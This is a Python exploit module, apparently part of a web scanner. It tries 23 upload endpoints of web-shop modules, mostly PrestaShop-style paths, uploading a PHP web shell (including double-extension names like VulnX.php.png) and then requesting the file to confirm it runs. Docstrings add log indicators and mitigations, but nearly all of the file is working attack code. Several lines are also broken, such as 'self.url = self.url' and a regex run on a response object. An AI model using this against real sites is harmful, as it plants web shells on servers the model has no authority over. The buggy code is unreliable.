import requests
import re
import os
from common.colors import que,vulnexploit,que,failexploit,run,W

class PSExploits(object):
    """Upload-and-probe checks against a fixed list of web-shop module paths.

    The "PS" prefix and the /modules/<name>/ layout suggest PrestaShop
    modules -- TODO confirm against the caller.

    Every check method follows one pattern: open a local file under shell/,
    POST it to an upload script below <url>/modules/..., then GET the path
    where the file is expected to land with the query string ?Vuln=X, and
    pass the response to re.findall with the pattern 'Vuln X'. Each method
    returns a dict with url, name and status; a 'shell' entry holding the
    probed URL is added when status is True.

    All requests are made with verify=False, so TLS certificates are not
    validated. The file objects opened for upload are not closed in the
    visible code.

    Defender notes (derived from the requests made below):
      * Log indicators: a POST to one of the module upload scripts named in
        the methods, followed by a GET for VulnX.php, VulnX.php.png or
        VulnX.php.mp4 in the same module's upload directory carrying the
        query string Vuln=X. psexploits() issues the whole series in a
        fixed order, so the sequence of paths is itself recognisable.
      * Mitigation: remove or update the listed modules, require
        authentication and server-side type checks on upload endpoints, and
        configure the web server so that upload directories never execute
        scripts (including file names that merely contain ".php").
    """

    def __init__(self, url, headers):
        """Set up the instance.

        url: base URL parameter (the assignment below reads self.url, not
            this parameter).
        headers: value passed as headers= to every requests call.
        """
        self.url = self.url
        self.headers = headers
    # columnadverts
    def columnadverts(self):
        """Check /modules/columnadverts/uploadimage.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/columnadverts/slides/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/columnadverts/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        # requests file tuple: (filename, file object, content type, extra part headers)
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        # URL where the uploaded file is expected to be reachable
        dump_data = self.url + "/modules/columnadverts/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="columnadverts",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="columnadverts",
                status=False
            )

    # soopabanners
    def soopabanners(self):
        """Check /modules/soopabanners/uploadimage.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/soopabanners/slides/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/soopabanners/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/soopabanners/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="soopabanners",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="soopabanners",
                status=False
            )

    # vtermslideshow
    def vtslide(self):
        """Check /modules/vtermslideshow/uploadimage.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/vtermslideshow/slides/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]); name is "vtslide".
        """
        endpoint = self.url + "/modules/vtermslideshow/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="vtslide",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="vtslide",
                status=False
            )

    # simpleslideshow
    def simpleslideshow(self):
        """Check /modules/simpleslideshow/uploadimage.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/simpleslideshow/slides/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/simpleslideshow/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/simpleslideshow/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="simpleslideshow",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="simpleslideshow",
                status=False
            )

    # productpageadverts
    def productpageadverts(self):
        """Check /modules/productpageadverts/uploadimage.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/productpageadverts/slides/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/productpageadverts/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/productpageadverts/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="productpageadverts",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="productpageadverts",
                status=False
            )

    # productpageadvertsb (the paths below are under homepageadvertise2)
    def productpageadvertsb(self):
        """Check /modules/homepageadvertise2/uploadimage.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/homepageadvertise2/slides/VulnX.php?Vuln=X. The result is
        reported under the name "productpageadvertsb", which differs from
        the module directory in the URLs.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/homepageadvertise2/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/homepageadvertise2/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="productpageadvertsb",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="productpageadvertsb",
                status=False
            )

    # jro_homepageadvertise
    def jro_homepageadvertise(self):
        """Check /modules/jro_homepageadvertise/uploadimage.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/jro_homepageadvertise/slides/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/jro_homepageadvertise/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/jro_homepageadvertise/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="jro_homepageadvertise",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="jro_homepageadvertise",
                status=False
            )
    # attributewizardpro
    def attributewizardpro(self):
        """Check /modules/attributewizardpro/file_upload.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/attributewizardpro/file_uploads/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/attributewizardpro/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/attributewizardpro/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="attributewizardpro",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="attributewizardpro",
                status=False
            )

    # 1attributewizardpro (same module name with a leading "1" in the directory)
    def oneattributewizardpro(self):
        """Check /modules/1attributewizardpro/file_upload.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/1attributewizardpro/file_uploads/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/1attributewizardpro/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/1attributewizardpro/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="oneattributewizardpro",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="oneattributewizardpro",
                status=False
            )


    # attributewizardpro.OLD
    def attributewizardpro_old(self):
        """Check /modules/attributewizardpro.OLD/file_upload.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/attributewizardpro.OLD/file_uploads/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).

        Defender note: the ".OLD" directory name suggests a renamed copy of
        a module left on disk; such copies stay reachable over HTTP unless
        removed -- presumably the reason this path is checked.
        """
        endpoint = self.url + "/modules/attributewizardpro.OLD/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/attributewizardpro.OLD/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="attributewizardpro_old",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="attributewizardpro_old",
                status=False
            )

    # attributewizardpro_x
    def attributewizardpro_x(self):
        """Check /modules/attributewizardpro_x/file_upload.php.

        Uploads shell/VulnX.php as multipart field 'image', then probes
        /modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/attributewizardpro_x/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="attributewizardpro_x",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="attributewizardpro_x",
                status=False
            )

    # advancedslider
    def advancedslider(self):
        """Check /modules/advancedslider/ajax_advancedsliderUpload.php.

        Uploads shell/VulnX.php.png (a double-extension file name) as
        multipart field 'image', then probes
        /modules/advancedslider/uploads/VulnX.php.png?Vuln=X.
        Returns dict(url, name, status[, shell]).

        Defender note: an upload filter that inspects only the final
        extension accepts this name; the web server should map script
        handlers on the final extension only.
        """
        endpoint = self.url + "/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php"
        img = open('shell/VulnX.php.png', 'rb')
        name_img= os.path.basename('shell/VulnX.php.png')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/advancedslider/uploads/VulnX.php.png?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="advancedslider",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="advancedslider",
                status=False
            )


    # cartabandonmentpro
    def cartabandonmentpro(self):
        """Check /modules/cartabandonmentpro/upload.php.

        Uploads shell/VulnX.php.png (double extension) as multipart field
        'image', then probes
        /modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/cartabandonmentpro/upload.php"
        img = open('shell/VulnX.php.png', 'rb')
        name_img= os.path.basename('shell/VulnX.php.png')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="cartabandonmentpro",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="cartabandonmentpro",
                status=False
            )

    # cartabandonmentproOld
    def cartabandonmentpro_old(self):
        """Check /modules/cartabandonmentproOld/upload.php.

        Uploads shell/VulnX.php.png (double extension) as multipart field
        'image', then probes
        /modules/cartabandonmentproOld/uploads/VulnX.php.png?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/cartabandonmentproOld/upload.php"
        img = open('shell/VulnX.php.png', 'rb')
        name_img= os.path.basename('shell/VulnX.php.png')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/cartabandonmentproOld/uploads/VulnX.php.png?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="cartabandonmentpro_old",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="cartabandonmentpro_old",
                status=False
            )

    # videostab
    def videostab(self):
        """Check /modules/videostab/ajax_videostab.php.

        Uploads shell/VulnX.php.mp4 (double extension) as multipart field
        'image', then probes /modules/videostab/uploads/VulnX.php.mp4?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload"
        img = open('shell/VulnX.php.mp4', 'rb')
        name_img= os.path.basename('shell/VulnX.php.mp4')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/videostab/uploads/VulnX.php.mp4?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="videostab",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="videostab",
                status=False
            )

    # wg24themeadministration
    def wg24themeadministration(self):
        """Check the wg24themeadministration module's wg24_ajax.php.

        Uploads shell/VulnX.php as field 'image' together with a 'type'
        entry set to 'pattern_upload' (both placed in the files= mapping),
        then probes
        /modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X.
        The POST URL is built with a double slash after /modules.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules//wg24themeadministration/wg24_ajax.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}),
                'type' : 'pattern_upload' }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="wg24themeadministration",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="wg24themeadministration",
                status=False
            )

    # fieldvmegamenu
    def fieldvmegamenu(self):
        """Check /modules/fieldvmegamenu/ajax/upload.php.

        Builds the same file tuple as the other checks, wraps it in a dict
        keyed "image[]" and sends that through the data= argument of
        requests.post, then probes
        /modules/fieldvmegamenu/uploads/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/fieldvmegamenu/ajax/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/fieldvmegamenu/uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="fieldvmegamenu",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="fieldvmegamenu",
                status=False
            )

    # wdoptionpanel
    def wdoptionpanel(self):
        """Check /modules/wdoptionpanel/wdoptionpanel_ajax.php.

        Uploads shell/VulnX.php as field 'image' together with a 'type'
        entry set to 'pattern_upload' (both placed in the files= mapping),
        then probes /modules/wdoptionpanel/upload/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/wdoptionpanel/wdoptionpanel_ajax.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}),
                'type' : 'pattern_upload' }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/wdoptionpanel/upload/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="wdoptionpanel",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="wdoptionpanel",
                status=False
            )

    # pk_flexmenu
    def pk_flexmenu(self):
        """Check /modules/pk_flexmenu/ajax/upload.php.

        Wraps the file tuple in a dict keyed "image[]" and sends it through
        the data= argument of requests.post, then probes
        /modules/pk_flexmenu/uploads/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/pk_flexmenu/ajax/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/pk_flexmenu/uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="pk_flexmenu",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="pk_flexmenu",
                status=False
            )

    # pk_vertflexmenu
    def pk_vertflexmenu(self):
        """Check /modules/pk_vertflexmenu/ajax/upload.php.

        Wraps the file tuple in a dict keyed "image[]" and sends it through
        the data= argument of requests.post, then probes
        /modules/pk_vertflexmenu/uploads/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/pk_vertflexmenu/ajax/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/pk_vertflexmenu/uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="pk_vertflexmenu",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="pk_vertflexmenu",
                status=False
            )

    # nvn_export_orders
    def nvn_export_orders(self):
        """Check /modules/nvn_export_orders/upload.php.

        Wraps the file tuple in a dict keyed "image[]" and sends it through
        the data= argument of requests.post. Unlike the other checks, the
        probed URL is an existing-looking script name,
        /modules/nvn_export_orders/nvn_extra_add.php?Vuln=X, not VulnX.php.
        Returns dict(url, name, status[, shell]).

        Defender note: for this module, integrity monitoring of
        nvn_extra_add.php is the relevant control, since the probe targets
        that file name -- presumably the upload overwrites it; confirm
        against the module source.
        """
        endpoint = self.url + "/modules/nvn_export_orders/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/nvn_export_orders/nvn_extra_add.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="nvn_export_orders",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="nvn_export_orders",
                status=False
            )

    # tdpsthemeoptionpanel
    def tdpsthemeoptionpanel(self):
        """Check /modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php.

        Wraps the file tuple in a dict keyed "image[]" and sends it through
        the data= argument of requests.post, then probes
        /modules/tdpsthemeoptionpanel/upload/VulnX.php?Vuln=X.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/tdpsthemeoptionpanel/upload/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="tdpsthemeoptionpanel",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="tdpsthemeoptionpanel",
                status=False
            )

    # masseditproduct
    def masseditproduct(self):
        """Check /modules/lib/redactor/file_upload.php.

        Wraps the file tuple in a dict keyed "image[]" and sends it through
        the data= argument of requests.post, then probes
        /masseditproduct/uploads/file/VulnX.php?Vuln=X. The POST path does
        not contain the module name and the probed path has no /modules
        prefix.
        Returns dict(url, name, status[, shell]).
        """
        endpoint = self.url + "/modules/lib/redactor/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/masseditproduct/uploads/file/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="masseditproduct",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="masseditproduct",
                status=False
            )

    def exploit_state(self,exploit):
        """Print one result line for a check.

        exploit: dict as returned by a check method. When exploit['status']
        is truthy the line is built from que, exploit['name'], vulnexploit
        and exploit['dump_data']; otherwise from que, exploit['name'] and
        failexploit. que, vulnexploit and failexploit are imported from
        common.colors.
        """
        if (exploit['status']):
            print(' {0} {1} {2} {3}'.format(que,exploit['name'],vulnexploit,exploit['dump_data']))
        else:
            print(' {0} {1} {2}'.format(que,exploit['name'],failexploit))

    def psexploits(self):
        """Run every check method once, in the fixed order below.

        Each result dict is handed straight to exploit_state for printing;
        nothing is returned. Each check issues one POST and one GET, so a
        full run produces the same ordered series of module paths in the
        target's access log.
        """
        self.exploit_state(self.columnadverts())
        self.exploit_state(self.soopabanners())
        self.exploit_state(self.vtslide())
        self.exploit_state(self.simpleslideshow())
        self.exploit_state(self.productpageadverts())
        self.exploit_state(self.productpageadvertsb())
        self.exploit_state(self.jro_homepageadvertise())
        self.exploit_state(self.attributewizardpro())
        self.exploit_state(self.oneattributewizardpro())
        self.exploit_state(self.attributewizardpro_old())
        self.exploit_state(self.attributewizardpro_x())
        self.exploit_state(self.advancedslider())
        self.exploit_state(self.cartabandonmentpro())
        self.exploit_state(self.cartabandonmentpro_old())
        self.exploit_state(self.videostab())
        self.exploit_state(self.wg24themeadministration())
        self.exploit_state(self.fieldvmegamenu())
        self.exploit_state(self.wdoptionpanel())
        self.exploit_state(self.pk_flexmenu())
        self.exploit_state(self.pk_vertflexmenu())
        self.exploit_state(self.nvn_export_orders())
        self.exploit_state(self.tdpsthemeoptionpanel())
        self.exploit_state(self.masseditproduct())